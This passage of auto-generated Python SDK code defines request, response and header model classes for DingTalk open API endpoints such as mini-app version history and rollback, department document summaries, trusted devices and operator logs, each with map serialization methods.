result['body'] = self.body
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
self.body = m.get('body')
return self
class ListMiniAppHistoryVersionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ListMiniAppHistoryVersionRequest(TeaModel):
def __init__(
self,
page_size: int = None,
page_number: int = None,
mini_app_id: str = None,
):
# 分页大小
self.page_size = page_size
# 分页码
self.page_number = page_number
# 小程序id
self.mini_app_id = mini_app_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.mini_app_id is not None:
result['miniAppId'] = self.mini_app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('miniAppId') is not None:
self.mini_app_id = m.get('miniAppId')
return self
class ListMiniAppHistoryVersionResponseBodyList(TeaModel):
def __init__(
self,
package_url: str = None,
package_size: str = None,
build_status: int = None,
version: str = None,
h_5bundle: str = None,
):
# 包url
self.package_url = package_url
# 包大小
self.package_size = package_size
# 构建状态
self.build_status = build_status
# 版本
self.version = version
# h5Bundle地址
self.h_5bundle = h_5bundle
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.package_url is not None:
result['packageUrl'] = self.package_url
if self.package_size is not None:
result['packageSize'] = self.package_size
if self.build_status is not None:
result['buildStatus'] = self.build_status
if self.version is not None:
result['version'] = self.version
if self.h_5bundle is not None:
result['h5Bundle'] = self.h_5bundle
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('packageUrl') is not None:
self.package_url = m.get('packageUrl')
if m.get('packageSize') is not None:
self.package_size = m.get('packageSize')
if m.get('buildStatus') is not None:
self.build_status = m.get('buildStatus')
if m.get('version') is not None:
self.version = m.get('version')
if m.get('h5Bundle') is not None:
self.h_5bundle = m.get('h5Bundle')
return self
class ListMiniAppHistoryVersionResponseBody(TeaModel):
def __init__(
self,
list: List[ListMiniAppHistoryVersionResponseBodyList] = None,
):
# result
self.list = list
def validate(self):
if self.list:
for k in self.list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['list'] = []
if self.list is not None:
for k in self.list:
result['list'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.list = []
if m.get('list') is not None:
for k in m.get('list'):
temp_model = ListMiniAppHistoryVersionResponseBodyList()
self.list.append(temp_model.from_map(k))
return self
class ListMiniAppHistoryVersionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListMiniAppHistoryVersionResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListMiniAppHistoryVersionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetDocCreatedDeptSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetDocCreatedDeptSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
# 启始数据游标
self.next_token = next_token
# 每页包含的数据条数
self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetDocCreatedDeptSummaryResponseBodyData(TeaModel):
def __init__(
self,
dept_id: str = None,
dept_name: str = None,
doc_created_cnt: str = None,
):
# 部门id
self.dept_id = dept_id
# 部门名称
self.dept_name = dept_name
# 最近1天累计钉钉文档创建数
self.doc_created_cnt = doc_created_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.dept_name is not None:
result['deptName'] = self.dept_name
if self.doc_created_cnt is not None:
result['docCreatedCnt'] = self.doc_created_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('deptName') is not None:
self.dept_name = m.get('deptName')
if m.get('docCreatedCnt') is not None:
self.doc_created_cnt = m.get('docCreatedCnt')
return self
class GetDocCreatedDeptSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetDocCreatedDeptSummaryResponseBodyData] = None,
next_token: int = None,
has_more: bool = None,
):
# 部门维度用户创建文档数
self.data = data
# 下一次请求的分页游标
self.next_token = next_token
# 是否有更多数据
self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetDocCreatedDeptSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetDocCreatedDeptSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetDocCreatedDeptSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetDocCreatedDeptSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class CreateTrustedDeviceHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class CreateTrustedDeviceRequest(TeaModel):
def __init__(
self,
user_id: str = None,
platform: str = None,
mac_address: str = None,
status: int = None,
):
# 员工userId
self.user_id = user_id
# 平台类型
self.platform = platform
# mac地址
self.mac_address = mac_address
# 设备状态
self.status = status
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.user_id is not None:
result['userId'] = self.user_id
if self.platform is not None:
result['platform'] = self.platform
if self.mac_address is not None:
result['macAddress'] = self.mac_address
if self.status is not None:
result['status'] = self.status
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('platform') is not None:
self.platform = m.get('platform')
if m.get('macAddress') is not None:
self.mac_address = m.get('macAddress')
if m.get('status') is not None:
self.status = m.get('status')
return self
class CreateTrustedDeviceResponseBody(TeaModel):
def __init__(
self,
success: bool = None,
):
self.success = success
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.success is not None:
result['success'] = self.success
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('success') is not None:
self.success = m.get('success')
return self
class CreateTrustedDeviceResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CreateTrustedDeviceResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CreateTrustedDeviceResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetPartnerTypeByParentIdHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetPartnerTypeByParentIdResponseBodyData(TeaModel):
def __init__(
self,
type_id: float = None,
type_name: str = None,
):
# 自标签id
self.type_id = type_id
# 子标签名
self.type_name = type_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.type_id is not None:
result['typeId'] = self.type_id
if self.type_name is not None:
result['typeName'] = self.type_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('typeId') is not None:
self.type_id = m.get('typeId')
if m.get('typeName') is not None:
self.type_name = m.get('typeName')
return self
class GetPartnerTypeByParentIdResponseBody(TeaModel):
def __init__(
self,
data: List[GetPartnerTypeByParentIdResponseBodyData] = None,
):
# 子标签列表
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetPartnerTypeByParentIdResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class GetPartnerTypeByParentIdResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetPartnerTypeByParentIdResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetPartnerTypeByParentIdResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SetDeptPartnerTypeAndNumHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SetDeptPartnerTypeAndNumRequest(TeaModel):
def __init__(
self,
dept_id: str = None,
partner_num: str = None,
label_ids: List[str] = None,
):
# 部门id
self.dept_id = dept_id
# 伙伴编码
self.partner_num = partner_num
# 伙伴类型id列表
self.label_ids = label_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.partner_num is not None:
result['partnerNum'] = self.partner_num
if self.label_ids is not None:
result['labelIds'] = self.label_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('partnerNum') is not None:
self.partner_num = m.get('partnerNum')
if m.get('labelIds') is not None:
self.label_ids = m.get('labelIds')
return self
class SetDeptPartnerTypeAndNumResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
self.validate_required(self.headers, 'headers')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class GetActiveUserSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetActiveUserSummaryResponseBody(TeaModel):
def __init__(
self,
act_usr_cnt_1m: str = None,
):
# 月活跃人数
self.act_usr_cnt_1m = act_usr_cnt_1m
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.act_usr_cnt_1m is not None:
result['actUsrCnt1m'] = self.act_usr_cnt_1m
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('actUsrCnt1m') is not None:
self.act_usr_cnt_1m = m.get('actUsrCnt1m')
return self
class GetActiveUserSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetActiveUserSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetActiveUserSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetOaOperatorLogListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetOaOperatorLogListRequest(TeaModel):
def __init__(
self,
op_user_id: str = None,
start_time: int = None,
end_time: int = None,
page_number: int = None,
page_size: int = None,
category_list: List[str] = None,
):
# 操作员userId
self.op_user_id = op_user_id
# 起始时间
self.start_time = start_time
# 结束时间
self.end_time = end_time
# 分页起始页
self.page_number = page_number
# 分页大小
self.page_size = page_size
# 操作分类(一级目录)
self.category_list = category_list
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.op_user_id is not None:
result['opUserId'] = self.op_user_id
if self.start_time is not None:
result['startTime'] = self.start_time
if self.end_time is not None:
result['endTime'] = self.end_time
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.category_list is not None:
result['categoryList'] = self.category_list
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('opUserId') is not None:
self.op_user_id = m.get('opUserId')
if m.get('startTime') is not None:
self.start_time = m.get('startTime')
if m.get('endTime') is not None:
self.end_time = m.get('endTime')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('categoryList') is not None:
self.category_list = m.get('categoryList')
return self
class GetOaOperatorLogListResponseBodyData(TeaModel):
def __init__(
self,
op_user_id: str = None,
op_name: str = None,
op_time: int = None,
category_1name: str = None,
category_2name: str = None,
content: str = None,
):
# 操作员userId
self.op_user_id = op_user_id
# 操作员名字
self.op_name = op_name
# 操作时间
self.op_time = op_time
# 操作分类(一级)
self.category_1name = category_1name
# 操作分类(二级)
self.category_2name = category_2name
# 操作详情
self.content = content
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.op_user_id is not None:
result['opUserId'] = self.op_user_id
if self.op_name is not None:
result['opName'] = self.op_name
if self.op_time is not None:
result['opTime'] = self.op_time
if self.category_1name is not None:
result['category1Name'] = self.category_1name
if self.category_2name is not None:
result['category2Name'] = self.category_2name
if self.content is not None:
result['content'] = self.content
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('opUserId') is not None:
self.op_user_id = m.get('opUserId')
if m.get('opName') is not None:
self.op_name = m.get('opName')
if m.get('opTime') is not None:
self.op_time = m.get('opTime')
if m.get('category1Name') is not None:
self.category_1name = m.get('category1Name')
if m.get('category2Name') is not None:
self.category_2name = m.get('category2Name')
if m.get('content') is not None:
self.content = m.get('content')
return self
class GetOaOperatorLogListResponseBody(TeaModel):
def __init__(
self,
data: List[GetOaOperatorLogListResponseBodyData] = None,
item_count: int = None,
):
self.data = data
# 当前获取记录数
self.item_count = item_count
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.item_count is not None:
result['itemCount'] = self.item_count
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetOaOperatorLogListResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('itemCount') is not None:
self.item_count = m.get('itemCount')
return self
class GetOaOperatorLogListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetOaOperatorLogListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetOaOperatorLogListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class RollbackMiniAppVersionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class RollbackMiniAppVersionRequest(TeaModel):
def __init__(
self,
ding_isv_org_id: int = None,
ding_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
rollback_version: str = None,
target_version: str = None,
mini_app_id: str = None,
):
self.ding_isv_org_id = ding_isv_org_id
self.ding_org_id = ding_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
# 被回滚版本
self.rollback_version = rollback_version
# 回滚到的版本
self.target_version = target_version
# 小程序id
self.mini_app_id = mini_app_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.rollback_version is not None:
result['rollbackVersion'] = self.rollback_version
if self.target_version is not None:
result['targetVersion'] = self.target_version
if self.mini_app_id is not None:
result['miniAppId'] = self.mini_app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('rollbackVersion') is not None:
self.rollback_version = m.get('rollbackVersion')
if m.get('targetVersion') is not None:
self.target_version = m.get('targetVersion')
if m.get('miniAppId') is not None:
self.mini_app_id = m.get('miniAppId')
return self
class RollbackMiniAppVersionResponseBody(TeaModel):
def __init__(
self,
code: int = None,
cause: str = None,
):
# 结果码
self.code = code
# 失败原因
self.cause = cause
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.code is not None:
result['code'] = self.code
if self.cause is not None:
result['cause'] = self.cause
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('code') is not None:
self.code = m.get('code')
if m.get('cause') is not None:
self.cause = m.get('cause')
return self
class RollbackMiniAppVersionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: RollbackMiniAppVersionResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = RollbackMiniAppVersionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class PublishFileChangeNoticeHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class PublishFileChangeNoticeRequest(TeaModel):
def __init__(
self,
file_id: str = None,
space_id: str = None,
operator_union_id: str = None,
operate_type: str = None,
):
# 钉盘文件id
self.file_id = file_id
# 钉盘spaceId
self.space_id = space_id
# 操作人unionId
self.operator_union_id = operator_union_id
# 操作类型: 1-添加 2-修改
self.operate_type = operate_type
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.space_id is not None:
result['spaceId'] = self.space_id
if self.operator_union_id is not None:
result['operatorUnionId'] = self.operator_union_id
if self.operate_type is not None:
result['operateType'] = self.operate_type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('spaceId') is not None:
self.space_id = m.get('spaceId')
if m.get('operatorUnionId') is not None:
self.operator_union_id = m.get('operatorUnionId')
if m.get('operateType') is not None:
self.operate_type = m.get('operateType')
return self
class PublishFileChangeNoticeResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
self.validate_required(self.headers, 'headers')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class GetGeneralFormCreatedDeptSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetGeneralFormCreatedDeptSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
# 启始数据游标
self.next_token = next_token
# 每页包含的数据条数
self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetGeneralFormCreatedDeptSummaryResponseBodyData(TeaModel):
def __init__(
self,
dept_id: str = None,
dept_name: str = None,
general_form_create_cnt_1d: str = None,
):
# 部门id
self.dept_id = dept_id
# 部门名称
self.dept_name = dept_name
# 最近1天累计发布智能填表数
self.general_form_create_cnt_1d = general_form_create_cnt_1d
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.dept_name is not None:
result['deptName'] = self.dept_name
if self.general_form_create_cnt_1d is not None:
result['generalFormCreateCnt1d'] = self.general_form_create_cnt_1d
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('deptName') is not None:
self.dept_name = m.get('deptName')
if m.get('generalFormCreateCnt1d') is not None:
